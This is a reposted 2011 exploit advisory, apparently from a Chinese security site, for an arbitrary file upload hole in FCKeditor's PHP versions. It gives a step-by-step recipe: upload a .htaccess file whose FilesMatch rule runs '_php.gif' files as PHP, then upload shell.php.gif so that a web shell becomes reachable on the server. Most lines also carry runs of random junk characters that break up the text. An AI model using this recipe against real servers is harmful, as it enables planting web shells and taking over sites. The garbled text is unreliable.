FCKeditor所有php版本Upload上传漏洞
' y9 F5 ?9 u# v, N. i作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07! J% k. @: Q* y, h1 c
减小字体 增大字体
4 L3 O& Y/ d# W0 }7 l! z[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability$ A3 D/ J7 _( J& m
[+] Date: 2011
4 s- c7 r" M; k& N. o2 |) \; Y[+] Author : sinesafe.cn
4 K$ W8 Q* M4 L, L# Z5 z4 @- u( K[+] Website : WwW.sinesafe.cn" W; C7 K/ f8 m9 B7 O
———————————————————; c' p/ G; q# b# t. }* w+ t
1.create a htaccess file:
# w! C3 z2 C8 w- C7 {- s2 zcode:
- D* p% L4 o% f& Q0 L" a4 d<FilesMatch “_php.gif”>* q( @4 H" M0 |7 U) \" {* ?
SetHandler application/x-httpd-php
& P+ B& t# V1 L</FilesMatch>% g3 ]% }' S6 L/ k5 `
8 F5 N) u0 ?. u5 R& A! R
2.Now upload this htaccess with FCKeditor. k, G. e' X& B( F% K: t% {2 y
/ E* X7 A0 T% i% `1 V- p$ H1 n
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
u# \% k0 \# r
4 V4 J8 H6 D3 g9 Y: c8 D- A ehttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
$ }6 u: X* s2 W! Q% z, P* \
/ U4 d5 m# K; j! p# _———————————————————————————————-. ~( s" M x: Z7 V
3.Now upload shell.php.gif with FCKeditor.
) n- F% d/ C1 s+ n4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
# C/ z0 r# }7 m. e2 z& j5.http://www.sinesafe.cn/anything/shell_php.gif
$ R$ {) y- U5 E. K2 D; C' ^7 \ N6.Now shell is available from server. |
! r- W1 p9 c h# c
5 C8 }9 b7 V8 c% Y9 d6 x; c* ?+ g5 P L) Y9 ^+ I+ L
|